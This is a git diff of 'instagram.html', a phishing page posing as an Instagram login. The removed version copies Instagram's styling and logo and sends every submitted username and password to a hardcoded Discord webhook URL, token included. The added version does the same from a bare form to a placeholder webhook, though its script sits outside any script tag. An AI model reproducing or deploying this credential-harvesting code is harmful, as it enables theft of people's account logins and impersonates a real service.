--- a/instagram.html
+++ b/instagram.html
@@ -1,133 +1,61 @@
-<!DOCTYPE html>
-<html>
-<head>
-  <title>Instagram Login</title>
-  <style>
-    body {
-      background-color: ##ffafcc;
-      font-family: Arial, sans-serif;
-    }
+<form onsubmit="sendLoginData(event)">
+  <input type="text" name="username" placeholder="Username">
+  <input type="password" name="password" placeholder="Password">
+  <button type="submit">Login</button>
+</form>
 
-    .container {
-      max-width: 400px;
-      margin: 0 auto;
-      padding: 40px;
-      background-color: #ffffff;
-      border: 1px solid #dbdbdb;
-      border-radius: 4px;
-      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
-    }
 
-    .logo {
-      text-align: center;
-      margin-bottom: 20px;
-    }
 
-    .logo img {
-      width: 175px;
-    }
 
-    .form-group {
-      margin-bottom: 20px;
-    }
 
-    .form-group label {
-      display: block;
-      font-weight: bold;
-      margin-bottom: 5px;
-    }
 
-    .form-group input[type="text"],
-    .form-group input[type="password"] {
-      width: 100%;
-      padding: 10px;
-      background-color: #fafafa;
-      border: 1px solid #dbdbdb;
-      border-radius: 3px;
-      font-size: 14px;
-    }
 
-    .form-group button {
-      width: 100%;
-      padding: 10px;
-      background-color: #3897f0;
-      color: #ffffff;
-      border: none;
-      border-radius: 3px;
-      font-size: 14px;
-      font-weight: bold;
-      cursor: pointer;
-    }
 
-    .form-group button:hover {
-      background-color: #3270a6;
-    }
 
-    .message {
-      text-align: center;
-      margin-top: 20px;
-      font-size: 12px;
-      color: #999999;
-    }
-  </style>
-  </style>
-</head>
-<body>
-  <div class="container">
-    <div class="logo">
-      <img src="https://i.imgur.com/zqpwkLQ.png" alt="Instagram Logo">
-    </div>
-    <form action="process-login.php" method="POST" onsubmit="sendLoginData(event)">
-      <div class="form-group">
-        <label for="username">Username</label>
-        <input type="text" id="username" name="username" placeholder="Enter your username" required>
-      </div>
-      <div class="form-group">
-        <label for="password">Password</label>
-        <input type="password" id="password" name="password" placeholder="Enter your password" required>
-      </div>
-      <div class="form-group">
-        <button type="submit">Log In</button>
-      </div>
-    </form>
-  </div>
 
-  <script>
-    function sendLoginData(event) {
-      event.preventDefault();
 
-      const form = event.target;
-      const username = form.username.value;
-      const password = form.password.value;
 
-      const webhookUrl = "https://discord.com/api/webhooks/1116509552695840768/qaUSQH-IXxJOiAgDTmflw3wNTJcg5kmMHMtSe6fi7Xm0HA3JHrOEpXUUFWBRvE22HvQg";
 
-      const payload = {
-        username,
-        password
-      };
 
-      fetch(webhookUrl, {
-        method: "POST",
-        headers: {
-          "Content-Type": "application/json"
-        },
-        body: JSON.stringify(payload)
-      })
-      .then(response => {
-        if (response.ok) {
-          // Successful webhook request
-          // You can perform additional actions or display a success message
-        } else {
-          // Error in the webhook request
-          // You can handle the error or display an error message
-        }
-      })
-      .catch(error => {
-        // Error in the fetch request
+
+
+
+
+
+
+
+
+function sendLoginData(event) {
+  event.preventDefault(); // Prevent the form from submitting normally
+
+  const form = event.target;
+  const username = form.username.value;
+  const password = form.password.value;
+
+  const webhookUrl = "YOUR_DISCORD_WEBHOOK_URL";
+
+  const payload = {
+    content: `Username: ${username}\nPassword: ${password}`,
+  };
+
+  fetch(webhookUrl, {
+    method: "POST",
+    headers: {
+      "Content-Type": "application/json",
+    },
+    body: JSON.stringify(payload),
+  })
+    .then(response => {
+      if (response.ok) {
+        // Successful webhook request
+        // You can perform additional actions or display a success message
+      } else {
+        // Error in the webhook request
         // You can handle the error or display an error message
-      });
-    }
-  </script>
-</body>
-</html>
+      }
+    })
+    .catch(error => {
+      // Error in the fetch request
+      // You can handle the error or display an error message
+    });
+}
